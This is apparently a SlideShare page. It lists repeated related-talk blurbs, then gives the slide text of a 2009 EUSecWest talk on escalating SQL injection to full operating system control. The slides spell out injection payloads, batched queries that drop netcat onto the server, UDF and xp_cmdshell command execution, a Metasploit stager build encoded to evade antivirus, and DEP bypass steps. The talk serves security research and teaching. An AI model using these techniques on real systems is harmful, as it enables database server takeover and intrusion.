Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at EUSecWest conference in London on May 28, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at OWASP AppSec Europe 2009 conference in Krakow on May 13, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at OWASP AppSec Europe 2009 conference in Krakow on May 13, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
A basic tutorial on using sqlmap on Kali Linux for sql injection.
The main focus being on comparison between manual and automated sql injection.
Some important parameters discussed and steps to be taken to discover vulnerabilities
By rushikesh kulkarni, president of Anonymous Club of BMSCE
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from
database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
This webcast will show you how to properly configure and deploy Memcached and Solr on Windows, including all the required Drupal integration. The webcast includes also instructions on proper configuration of your Drupal cron tasks for Solr indexing in conjunction with Windows Task Scheduler.
How to export import a mysql database via ssh in aws lightsail wordpress rizw...AlexRobert25
Suppose you want a database backup of any instances ‘ in AWS Lightsail WordPress ‘ through putty or SSH. For that, first, we need to create an instance
Linux kernel has a special feature called Watchdog timer which would reset the system in case of any software faults | system hangs | or any application crashes after a timeout has reached.
Armitage developed by Raphael mudge a gui format for metasploit framework for pentesr and security researcher,here u can manage as also prevent the cyber attack.this project means for educational purpose only.do not use as crime
I am Anne L. I am an Operating System Assignment Expert at programminghomeworkhelp.com. I hold a Ph.D. in Programming, Auburn University, USA. I have been helping students with their homework for the past 8 years. I solve assignments related to Operating systems.
Visit programminghomeworkhelp.com or email support@programminghomeworkhelp.com.
You can also call on +1 678 648 4277 for any assistance with Operating System Assignments.
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
A basic tutorial on using sqlmap on Kali Linux for sql injection.
The main focus being on comparison between manual and automated sql injection.
Some important parameters discussed and steps to be taken to discover vulnerabilities
By rushikesh kulkarni, president of Anonymous Club of BMSCE
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from
database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
This webcast will show you how to properly configure and deploy Memcached and Solr on Windows, including all the required Drupal integration. The webcast includes also instructions on proper configuration of your Drupal cron tasks for Solr indexing in conjunction with Windows Task Scheduler.
How to export import a mysql database via ssh in aws lightsail wordpress rizw...AlexRobert25
Suppose you want a database backup of any instances ‘ in AWS Lightsail WordPress ‘ through putty or SSH. For that, first, we need to create an instance
Linux kernel has a special feature called Watchdog timer which would reset the system in case of any software faults | system hangs | or any application crashes after a timeout has reached.
Armitage developed by Raphael mudge a gui format for metasploit framework for pentesr and security researcher,here u can manage as also prevent the cyber attack.this project means for educational purpose only.do not use as crime
I am Anne L. I am an Operating System Assignment Expert at programminghomeworkhelp.com. I hold a Ph.D. in Programming, Auburn University, USA. I have been helping students with their homework for the past 8 years. I solve assignments related to Operating systems.
Visit programminghomeworkhelp.com or email support@programminghomeworkhelp.com.
You can also call on +1 678 648 4277 for any assistance with Operating System Assignments.
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
What they are, steps you can take to prevent them, a brief overview.
3/13/2013 winter term 2013 at Portland State University for the Introduction to Databases class.
Presented by Stacy Watts and Tyler Fetters
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
How SQL Server was ported to Linux? The presentation goes through some of the concepts: SQLOS, Drawbridge and Containers. It shows the role of SQLPAL as a platform abstraction layer.
Architecting .NET solutions in a Docker ecosystem - .NET Fest Kyiv 2019Alex Thissen
Conference: .NET Fest 2019
Location: Kyiv, Ukraine
Abstract: You must have noticed how Docker and containers is playing a more and more important part in .NET development. Docker support is everywhere, so it should be easy to build solutions based on container technology, right? But, it takes a bit more to architect and create a .NET solution that use Docker at its core. Many questions arise: How do you design a solution architecture that fits well with containers? Would I use .NET or .NET Core? What is a proper way to migrate to such an architecture? What changes in the .NET implementation from pre-Docker solutions with micro-services? Where do container orchestrators fit in and how do I build and deploy my solutions on a Docker container cluster, such as Azure Kubernetes Service?
These and many other questions will be answered in this session. You will learn how to design and architect your .NET solutions and get a flying start to create, build and run Docker-based containerized applications.
A technical overview of PowerShell. See http://blogs.msdn.com/allandcp/archive/2009/03/11/powershell-to-the-people-the-aftermath.aspx for more background and resources.
Overview SQL Server on Linux
It is just SQL Server. Everything just works
Initially aimed at Database Engine
Currently around 95% features fully supported.
Integration testing is hard, and often teams are tempted to do it in production. Testcontainers allows writing meaningful integration tests spawning Docker containers for databases, queue systems, kv-store, other services. The talk, a blend of slides and live code, will show how we are able to deploy without fear while integrating with a dozen of different datastores. Don't mock your database with fake data anymore, work with real data
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Advanced SQL injection to operating system full control (short version)
1. Advanced SQL injection to
operating system full control
Bernardo Damele Assumpção Guimarães
EUSecWest 2009
London (UK) – May 28, 2009
2. Who I am
Bernardo Damele Assumpção Guimarães:
Proud father
Penetration tester / security researcher
Portcullis Computer Security Ltd
Open source projects
sqlmap lead developer
MySQL UDF repository developer
Metasploit contributor
EUSecWest 2009, London (UK) May 28, 2009 2
3. SQL injection definition
SQL injection attacks are a type of injection
attack, in which SQL commands are injected
into data-plane input in order to affect the
execution of predefined SQL statements
It is a common threat in web applications that
lack of proper sanitization on user-supplied
input used in SQL queries
It does not affect only web applications!
EUSecWest 2009, London (UK) May 28, 2009 3
4. SQL injection techniques
Boolean based blind SQL injection:
par=1 AND ORD(MID((SQL query),
Nth char, 1)) > Bisection num--
UNION query (inband) SQL injection:
par=1 UNION ALL SELECT query--
Batched queries SQL injection:
par=1; SQL query;--
EUSecWest 2009, London (UK) May 28, 2009 4
5. How far can an attacker go by
exploiting a SQL injection?
EUSecWest 2009, London (UK) May 28, 2009 5
6. Scope of the analysis
Three database software:
MySQL on Windows
PostgreSQL on Windows and Linux
Microsoft SQL Server on Windows
Three web application languages:
ASP on Microsoft IIS, Windows
ASP.NET on Microsoft IIS, Windows
PHP on Apache and Microsoft IIS
EUSecWest 2009, London (UK) May 28, 2009 6
7. Batched queries
In SQL, batched queries are multiple SQL
statements, separated by a semicolon, and
passed to the database
Example:
SELECT col FROM table1 WHERE
id=1; DROP table2;
EUSecWest 2009, London (UK) May 28, 2009 7
8. Batched queries support
ASP ASP.NET PHP
MySQL No Yes No
PostgreSQL Yes Yes Yes
Microsoft SQL Server Yes Yes Yes
Programming languages and their DBMS connectors default
support for batched queries
EUSecWest 2009, London (UK) May 28, 2009 8
10. File write access on MySQL
On the attacker box:
Encode the local file content to its
corresponding hexadecimal string
Split the hexadecimal encoded string into
chunks long 1024 characters each
EUSecWest 2009, London (UK) May 28, 2009 10
11. File write access on MySQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data longblob);
INSERT INTO footable(data) VALUES
(0x4d5a90…610000);
UPDATE footable SET
data=CONCAT(data, 0xaa270000…000000);
[…];
SELECT data FROM footable INTO DUMPFILE
'C:/WINDOWS/Temp/nc.exe';
EUSecWest 2009, London (UK) May 28, 2009 11
12. File write access on PostgreSQL
On the attacker box:
Encode the local file content to its
corresponding base64 string
Split the base64 encoded string into chunks
long 1024 characters each
EUSecWest 2009, London (UK) May 28, 2009 12
13. File write access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
INSERT INTO footable(data) VALUES ('TVqQ…');
UPDATE footable SET data=data||'U8pp…vgDw';
[…]
SELECT lo_create(47);
UPDATE pg_largeobject SET data=(DECODE((SELECT
data FROM footable), 'base64')) WHERE loid=47;
SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe');
EUSecWest 2009, London (UK) May 28, 2009 13
14. File write access on MS SQL Server
Microsoft SQL Server can execute commands:
xp_cmdshell()
EXEC xp_cmdshell('echo … >> filepath')
Session user must have CONTROL SERVER privilege
On the attacker box:
Split the file in chunks of 64Kb
Convert each chunk to its plain text debug script
format
EUSecWest 2009, London (UK) May 28, 2009 14
15. File write access on MS SQL Server
Example of nc.exe:
00000000 4D 5A 90 00 03 00 00 00
00000008 04 00 00 00 FF FF 00 00
[…]
As a plain text debug script:
n qqlbc // Create a temporary file
rcx // Write the file size in
f000 // the CX registry
f 0100 f000 00 // Fill the segment with 0x00
e 100 4d 5a 90 00 03 […] // Write in memory all values
e 114 00 00 00 00 40 […]
[…]
w // Write the file to disk
q // Quit debug.exe
EUSecWest 2009, London (UK) May 28, 2009 15
16. File write access on MS SQL Server
Via batched queries SQL injection technique:
For each debug script:
EXEC master..xp_cmdshell '
echo n qqlbc >> C:WINDOWSTempzdfiq.scr &
echo rcx >> C:WINDOWSTempzdfiq.scr &
echo f000 >> C:WINDOWSTempzdfiq.scr &
echo f 0100 f000 00 >>
C:WINDOWSTempzdfiq.scr &
[…]'
EUSecWest 2009, London (UK) May 28, 2009 16
17. File write access on MS SQL Server
EXEC master..xp_cmdshell '
cd C:WINDOWSTemp &
debug < C:WINDOWSTempzdfiq.scr &
del /F C:WINDOWSTempzdfiq.scr &
copy /B /Y netcat+qqlbc netcat'
EXEC master..xp_cmdshell '
cd C:WINDOWSTemp &
move /Y netcat C:/WINDOWS/Temp/nc.exe'
EUSecWest 2009, London (UK) May 28, 2009 17
19. User-Defined Function
In SQL, a user-defined function is a custom
function that can be evaluated in SQL
statements
UDF can be created from shared libraries
that are compiled binary files
Dynamic-link library on Windows
Shared object on Linux
EUSecWest 2009, London (UK) May 28, 2009 19
20. UDF injection
On the attacker box:
Compile a shared library defining two UDF:
sys_eval(cmd): executes cmd, returns stdout
sys_exec(cmd): executes cmd, returns status
The shared library can also be packed to speed
up the upload via SQL injection:
Windows: UPX for the dynamic-link library
Linux: strip for the shared object
EUSecWest 2009, London (UK) May 28, 2009 20
21. UDF injection
Via batched queries SQL injection technique:
Upload the shared library to the DBMS file system
Create the two UDF from the shared library
Call either of the UDF to execute commands
EUSecWest 2009, London (UK) May 28, 2009 21
22. UDF injection on MySQL
UDF Repository for MySQL
lib_mysqludf_sys shared library:
Approximately 6Kb packed
Added sys_eval() to return command
standard output
Compliant with MySQL 5.0+
Works on all versions of MySQL from 4.1.0
Compatible with both Windows or Linux
EUSecWest 2009, London (UK) May 28, 2009 22
23. UDF injection on MySQL
Via batched queries SQL injection technique:
Fingerprint MySQL version
Upload the shared library to a file system path
where the MySQL looks for them
CREATE FUNCTION sys_exec RETURNS int
SONAME 'libudffmwgj.dll';
CREATE FUNCTION sys_eval RETURNS string
SONAME 'libudffmwgj.dll';
EUSecWest 2009, London (UK) May 28, 2009 23
24. UDF injection on PostgreSQL
Ported MySQL shared library to PostgreSQL
lib_postgresqludf_sys shared library:
Approximately 6Kb packed
C-Language Functions: sys_eval() and
sys_exec()
Compliant with PostgreSQL 8.2+ magic block
Works on all versions of PostgreSQL from 8.0
Compatible with both Windows or Linux
EUSecWest 2009, London (UK) May 28, 2009 24
25. UDF injection on PostgreSQL
Via batched queries SQL injection technique:
Fingerprint PostgreSQL version
Upload the shared library to any file system path
where PostgreSQL has rw access
CREATE OR REPLACE FUNCTION sys_exec(text)
RETURNS int4 AS 'libudflenpx.dll',
'sys_exec' LANGUAGE C […];
CREATE OR REPLACE FUNCTION sys_eval(text)
RETURNS text AS 'libudflenpx.dll',
'sys_eval' LANGUAGE C […];
EUSecWest 2009, London (UK) May 28, 2009 25
26. Command execution on MS SQL Server
xp_cmdshell() stored procedure:
Session user must have sysadmin role or be
specified as a proxy account
Enabled by default on MS SQL Server 2000 or re-
enabled via sp_addextendedproc
EUSecWest 2009, London (UK) May 28, 2009 26
27. Command execution on MS SQL Server
Disabled by default on MS SQL Server 2005
and 2008, it can be:
Re-enabled via sp_configure
Created from scratch using shell object
EUSecWest 2009, London (UK) May 28, 2009 27
29. OOB connection definition
Contrary to in-band connections (HTTP), it uses
an alternative channel to return data
This concept can be extended to establish a full-
duplex connection between the attacker
host and the database server
Over this channel the attacker can have a command
prompt or a graphical access (VNC) to the DBMS
server
EUSecWest 2009, London (UK) May 28, 2009 29
30. A good friend: Metasploit
Metasploit is a powerful open source exploitation
framework
Post-exploitation in a SQL injection scenario
SQL injection as a stepping stone for OOB channel
using Metasploit can be achieved
Requires file system write access and command
execution via in-band connection – already
achieved
EUSecWest 2009, London (UK) May 28, 2009 30
31. OOB via payload stager
On the attacker box:
Forge a stand-alone payload stager with
msfpayload
Encode it with msfencode to bypass AV
Pack it with UPX to speed up the upload via SQL
injection if the target OS is Windows
EUSecWest 2009, London (UK) May 28, 2009 31
32. OOB via payload stager
Example of payload stager creation and encode:
$ msfpayload windows/meterpreter/bind_tcp
EXITFUNC=process LPORT=31486 R | msfencode –e
x86/shikata_ga_nai -t exe -o stagerbvdcp.exe
Payload stager compression:
$ upx -9 –qq stagerbvdcp.exe
The payload stager size is 9728 bytes, as a
compressed executable its size is 2560 bytes
EUSecWest 2009, London (UK) May 28, 2009 32
33. OOB via payload stager
On the attacker box:
Run msfcli with multi/handler exploit
Via batched queries SQL injection technique:
Upload the stand-alone payload stager to the file
system temporary folder of the DBMS
Execute it via sys_exec() or xp_cmdshell()
EUSecWest 2009, London (UK) May 28, 2009 33
34. Stored procedure buffer overflow
Discovered by Bernhard Mueller on
December 4, 2008
sp_replwritetovarbin heap-based buffer
overflow on Microsoft SQL Server 2000 SP4 and
Microsoft SQL Server 2005 SP2
Patched by Microsoft on February 10, 2009 –
MS09-004
EUSecWest 2009, London (UK) May 28, 2009 34
35. Buffer overflow exploit
Session user needs only EXECUTE privilege on the
stored procedure – default
Guido Landi wrote the first public stand-
alone exploit for this vulnerability
I added support for multi-stage payload and
integrated it in sqlmap
EUSecWest 2009, London (UK) May 28, 2009 35
36. Data Execution Prevention
DEP is a security feature that prevents code
execution in memory pages not marked as
executable
It can be configured to allow exceptions
Default settings allow exceptions:
Windows 2003 SP1+: OptOut
Windows 2008 SP0+: OptOut
EUSecWest 2009, London (UK) May 28, 2009 36
37. Bypass DEP
When it is set to OptOut:
Exception for sqlservr.exe in the registry
Via bat file by calling reg
Via reg file by passing it to regedit
Via master..xp_regwrite
Upload and execute a bat file which executes
sc to restart the process
EUSecWest 2009, London (UK) May 28, 2009 37
38. Credits
Guido Landi
Alberto Revelli
Alessandro Tanasi
Metasploit development team
More acknowledgments and references on the
white paper, http://tinyurl.com/sqlmap1
EUSecWest 2009, London (UK) May 28, 2009 38